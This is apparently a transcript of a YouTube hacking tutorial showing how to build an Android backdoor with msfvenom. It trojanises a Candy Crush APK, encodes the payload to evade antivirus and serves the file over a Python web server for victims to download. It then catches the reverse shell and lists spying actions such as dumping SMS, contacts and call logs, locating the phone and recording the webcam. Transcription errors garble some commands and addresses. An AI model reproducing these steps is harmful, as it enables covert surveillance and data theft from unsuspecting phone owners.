How do someone enter a house? It's quite simple, through a door. But why are we talking about doors and houses? Hold on, before we start the video, what's up guys? Welcome to Hacker TV. This is your friendly neighborhood hacker, Mr. Zero Cool. If you haven't subscribed to the channel, do hit the subscribe button. Today's video we'll learn about computer backdoors, how do they work, and how you can create your own backdoors with msfvenom. Without much delay, let's begin. So what's a computer backdoor? Well, to be honest, it's nothing more than a piece of a code. And that piece of code, when executes on an operating system, it grants a remote access to that machine for someone at a remote location. And why were we talking about the houses and doors? Well, getting an access to a computer or a network can be thought of something similar to entering a house. If you have the right access, you will log into the machine with the correct credentials, just like entering the house through the front door. If you do not have the right access, you'll use something called as a backdoor to access the computer, just like someone sneaking into the house through a back door. Alright, now that we know about computer backdoors, let us learn how does it work. But before that, first learn how computers work. Every computer system runs on an operating system like Windows, Linux or Mac OS. These operating systems run a collection of processes responsible for providing different functions, and these processes execute instructions inside the CPU. Each of the process has access to different computer resources like display, audio, network, keyboard, etc. depending on the access level. At last, all of these are zeros and ones running inside the computer CPU. Now, backdoor is a piece of a code that can be compiled on various platforms like Windows, Linux, Mac, or on any programming language like Python, Perl, or Java, and for a different process architecture like 32 or 64-bit. What happens when a backdoor executes inside a computer as a process? Well, every backdoor program has a primary job of connecting the victim machine to the attacker machine. And it does this by opening a network port on the host machine and thus allowing the backdoor connection. There can be two ways to get the shell, or we call it as an access to the system. Forward shell is where an attacker initiates a connection to the victim machine. Reverse shell is something which is opposite of the forward shell, wherein the victim machine or the client initiates a connection to the attacker or the server. Now that we learned the bits about computer backdoor, let's begin playing with msfvenom and make our own backdoor apps. In this lab video, we are going to learn how to create backdoor applications using msfvenom. msfvenom is basically a tool that comes as a part of a Metasploit framework. And if you're new to this thing, you can actually check out my video on Metasploit. Now, today we'll learn about the msfvenom CLI tool, which is basically a payload generator and an encoder tool. We'll use this to create backdoor applications for, let's say, Android, Windows, or Linux. To use this tool from CLI, pretty straightforward. As you can see, we just need to give the command called as msfvenom, followed by a bunch of options that lets us create the backdoors. But before we create a backdoor, let's see what all options are available to us. So there's one option called as list, which help us look at the different payloads or encoders available in this tool. So you can use msfvenom -list followed by payload. Yeah, and you can see that there are a list of payloads available for different operating systems like Windows, Linux, Python, etc. Now, similarly, we can actually list encoders or the different platforms and architectures that are supported by this tool. Or there's one more option, we will go through that after this. So these are the different encoders available. Basically, the use of encoders is to evade antivirus and any kind of detection system that detects a payload or a backdoor, I would say. Now, in case if you want to look at everything that's available, you just go with the option -list all. So the output would be something, a list of all the payloads available and the different encoders, followed by what all different platforms and architectures are supported. You can go through this output and just look at the different things. Now let's come to how we can actually create a backdoor. Let me pull out my directory. So we'll see two examples over here. First, we'll create a plain backdoor application, and in the second example, I'll try to inject the backdoor inside an existing application, which is Candy Crush game over here. Now, to to generate the backdoor, the command is msfvenom followed by -p, which means what payload I need to use. So in this case, I'll use Android Metadata viewers TCP. So this is my payload, and for every payload there are few options like the host and the port on which that payload should connect. So in this case, my local host will be the IP address of this machine, which is 34.80.148, and L port equals to the port on which it is going to connect. Let's give 1337. That's it, and we need to give an option called as R and followed by -o. So whatever name you want to give it to your backdoor, like back.apk or anything like game.apk, let's say. That's it. And now the msfvenom is going to pull out that payload and choose the default architecture. As you can see, we didn't specify an architecture, so it pulled the default for Android and it chose the default platform as well. Now if I do ls, I can see that I already have a game.apk. So now that backdoor has been constructed, the next step would be to deliver the backdoor to the victim machine. There are several ways to do this, we'll see later on, but before that I want to show you how you can actually create a backdoor, or you can inject a backdoor inside an existing APK. For this we have the pretty much same command, but slightly difference is that we are going to use option -x followed by our APK, then -p followed by our payload, which is viewers TCP. L host is L4.80.58. Port equals 177. Okay, one quick thing that I want to talk about is make sure if the device on which you are going to test this backdoor is not publicly available through any IP address. So you do create your backdoor with a public IP over here. So right now the machine on which I'm experimenting is on a cloud machine and it is easily accessible on the internet. So wherever I use this backdoor, it will be able to connect to my public IP on this particular port. So now that we have given the port and the host, what next is what would be the output? So I say candy latest .apk. Now it's gonna take a little while because it's going to decompress the APK and inject the payload and then again compile back the APK. Alright, now that it has completed, we can actually see the output over here, which is Candy Crush latest.apk. So now we saw two examples. The first one was to create a plain backdoor, which is the game.apk using the CLI options. Second is to inject the payload inside an existing APK. Now that we have created the backdoor, what's the next step? I mean, how we can actually use it to gain access to any machine. So for that, what next step is to basically deliver this payload to the victim machine. There are multiple ways in which you can do it. Yeah, you can actually manually download this on a victim machine, or you can actually send it over email or any other means where you can actually encrypt it or some other way. Today in this example, I'm going to show you how you can actually use Python to create a web server, and using that web server you can actually deliver this file to anywhere on the internet. So pretty straightforward with Python. All you need to do is run python 3 minus module http.server. That's it. In this particular directory, my Python server is running on port 8000. So all you need to do is go to, let's say, site. All you need to do is to go to 34.80 148.80:8000, and you can see that I can pull out these files, or I can download whatever file I want. So you can basically forward this URL to anyone whom you want to try this or experiment this thing out. Now, once the payload has been downloaded, the next step is to basically install this APK on the Android phone. And once the APK has been installed, what it will try to do is it will try to perform a reverse TCP connection to this particular machine on the port 1337. So now we'll use MSF console to basically access the Metadata Shell. So whenever, let's say, the application is executed on the victim machine, it will try to connect to this public, the public cloud server on the port 1337 that we configured. To configure the Metasploit, we basically use exploit multi-handler. Now inside this we'll need to configure the options. The first one is the payload. Since we are using Android, so we'll configure the Android payload, Android Metadata reverse TCP. That's it. And we'll set the options. That's it. Now that it's configured, we can actually run this thing, and meanwhile on the other side I'll try to execute the application. And now that the application is executed, we can see that we have a reverse shell from that particular machine to this particular IP address. And in my Metasploit video, I've given the demonstration of what all you can do with Metadata. So just like looking at what all contents are there inside this directory, you can see that see the Candy Crush folder and what all data is over here. And there are a bunch of all interesting commands that you can use to sometimes geolocate where that phone is, or dump the SMS, call logs, contacts. Even you can play some files, record webcam, etc. So with this we come to the end of the video. I hope you liked the video. Do hit the like button and drop in your comments. Till then, keep hacking, stay safe, stay secure. Hacker TV signing off.
Again.